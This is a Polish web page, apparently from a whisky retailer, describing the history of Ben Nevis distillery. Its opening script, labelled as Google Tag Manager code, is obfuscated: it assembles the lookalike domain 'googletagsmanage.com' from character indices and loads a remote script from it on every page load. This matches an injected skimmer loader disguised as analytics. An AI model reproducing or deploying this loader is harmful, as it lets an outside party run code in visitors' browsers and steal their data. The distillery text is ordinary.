/* ---------------- GoogleTagsManager start code ------------------ */ var bytes = [0, 0, 2, 3, 4, 5, 6, 7, 13, 14, 15, 18, 11, 14, 17, 14, 2, 7, 8, 9, 10, 11]; var i, s, o, g, r, a, m = [], hh = ['/', '.', '', 'om', '', 'c',], gtagHost = '//google.com/tag/ns', gtag = ''; for (var k = 0; k < bytes.length; k++) { gtag = gtag + gtagHost[bytes[k]]; } (function () { var li = document.createElement('script'); li.type = 'text/javascript'; li.src = gtag + "/gtag/?id=UA-23200573-1"; li.async = true; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(li, s); })(); /* ------------ GoogleTagsManager end code ------------------*/

Ben Nevis Distillery

BEN NEVIS

Została założona nad brzegami Loch Linnhe przez „Long Johna” MacDonalda w 1825 roku. W latach 80. XIX wieku, gdy produkcja sięgała 680 tys. litrów rocznie, rodzina MacDonaldów miała własną flotę parowców, którymi transportowała whisky na południe. Whisky nazywała się „Long John's Dew of Ben Nevis”. Skrócona nazwa pojawiła się po latach na słynnym kupażu należącym do Whitbreada. W 1981 roku browar kupił gorzelnię i pozostał jej właścicielem przez kolejną dekadę do czasu, gdy firma zdecydowała się wycofać z rynku szkockiej whisky. Wtedy Ben Nevis stała się własnością japońskiego potentata alkoholowego – Nikka. Dziś w gorzelni mieści się centrum informacyjne i jest jednym z nielicznych miejsc, gdzie można kupić całą beczkę słodowej whisky, przechowywaną wtedy w magazynach do czasu, gdy malt będzie gotowy do butelkowania. Przez 15 lat z beczki po sherry paruje blisko jedna piąta alkoholu, jednak tym co pozostaje można zapełnić około 600 butelek.

www.bennevisdistillery.com

Pokaż:
Sortuj według: